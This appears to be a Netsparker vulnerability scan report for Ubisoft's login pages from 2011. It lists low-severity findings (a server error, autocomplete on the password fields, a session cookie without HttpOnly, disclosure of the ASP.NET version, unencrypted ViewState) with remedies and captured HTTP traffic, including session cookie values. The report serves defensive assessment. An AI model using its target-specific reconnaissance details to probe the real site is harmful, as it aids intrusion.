Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /login/Message.aspx

/login/Message.aspx CONFIRMED

Request

GET /login/Message.aspx?MessageKey=100 HTTP/1.1
Referer: https://secure.ubi.com/login/ForgotPassword.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 22 Apr 2011 16:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11583


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Message</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Message.aspx?MessageKey=100" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6HZcCCc5EL8OTY0liDUAUGDNe67Q==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_errors.gif"></td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td height="20" colspan="2"></td>
</tr>
<tr>
<td></td>
<td class="content"><b>The site encountered an unexpected error. Please try again later or <a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">contact us</a> if the problem persists.</b></td>
</tr>


<script type="text/javascript"></script>
<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><a OnMouseOver="UBI_SetImage('m_ImageGo','/login/Skins/default/en-US/btn_Go_over.gif')" OnMouseOut="UBI_SetImage('m_ImageGo','/login/Skins/default/en-US/btn_Go.gif')" href="http://www.ubi.com/US/"><img id="m_ImageGo" src="/login/Skins/default/en-US/btn_Go.gif" alt="" border="0" /></a>
</td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_MESSAGES';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_MESSAGES&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fForgotPassword.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

</form>
</body>
</HTML>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /login/Login.aspx

/login/Login.aspx CONFIRMED

Identified Field Name

login

Request

GET /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=vfo11q45ehliqg55jytcst55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: cookie_enabled=true; domain=.ubi.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13229


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2f'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
}

//-->
</script>

<script type="text/javascript">document.getElementById('login').focus();</script>

</form>
</body>
</HTML>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /login/

/login/ CONFIRMED

Identified Cookie

ASP.NET_SessionId

Request

GET /login/ HTTP/1.1
Referer: https://secure.ubi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Fri, 22 Apr 2011 16:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /login/Login.aspx
Set-Cookie: ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/login/Login.aspx'>here</a>.</h2>
</body></html>
ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /login/

/login/

Extracted Version

1.1.4322

Request

GET /login/ HTTP/1.1
Referer: https://secure.ubi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Fri, 22 Apr 2011 16:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /login/Login.aspx
Set-Cookie: ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/login/Login.aspx'>here</a>.</h2>
</body></html>
ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>      

Remedy References

- /login/Login.aspx

/login/Login.aspx

ViewState Version

.NET Framework 1.x

Request

GET /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=vfo11q45ehliqg55jytcst55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: cookie_enabled=true; domain=.ubi.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13229


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

